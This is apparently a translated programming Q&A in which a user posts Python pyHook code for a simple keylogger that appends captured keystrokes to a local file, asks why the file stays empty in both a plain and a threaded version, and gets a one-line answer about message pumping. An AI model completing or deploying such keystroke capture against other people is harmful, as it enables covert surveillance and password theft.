在一个简单的键盘记录器的不同线程中以特定时间间隔写入文件

时间:2013-05-04 19:00:10

标签: python multithreading file logging keyboard

import pythoncom , pyHook, time

temp_keylogs = ''
def OnKeyboardEvent(event):
    global temp_keylogs
    key = chr(event.Ascii)
    temp_keylogs += key

hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()

while True:
    f = open('output.txt', 'a')
    f.write(temp_keylogs)
    temp_keylogs = ''
    f.close()
    time.sleep(4)

我不明白为什么这段代码没有将4秒后执行的所有击键写入名为'output.txt'的文件。没有错误被抛出,所以它正在编译好我相信,但它没有写任何文件。

修改 的 我按照建议添加了pythoncom.PumpMessages(),但这实际上提供了两个while循环;那么,我需要线程来做到这一点吗?

我在这里尝试了线程版本:

import pythoncom , pyHook, time, thread

temp_keylogs = ''
def OnKeyboardEvent(event):
    global temp_keylogs
    key = chr(event.Ascii)
    temp_keylogs += key

def file_write(temp_keylogs):
    while True:
        print 'yes'
        f = open('output.txt', 'a')
        f.write(temp_keylogs)
        f.close()
        temp_keylogs = ''
        time.sleep(4)

hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
try:
    thread.start_new_thread( file_write, (temp_keylogs,) )
    thread.start_new_thread( pythoncom.PumpMessages() )
except:
    print 'thread not started'

但它仍然没有写入文件。所以,我仍然不确定出了什么问题。

1 个答案:

答案 0 :(得分:1)

你错过了泵消息

pythoncom.PumpMessages()

没有它,你无法访问密钥。请参阅docs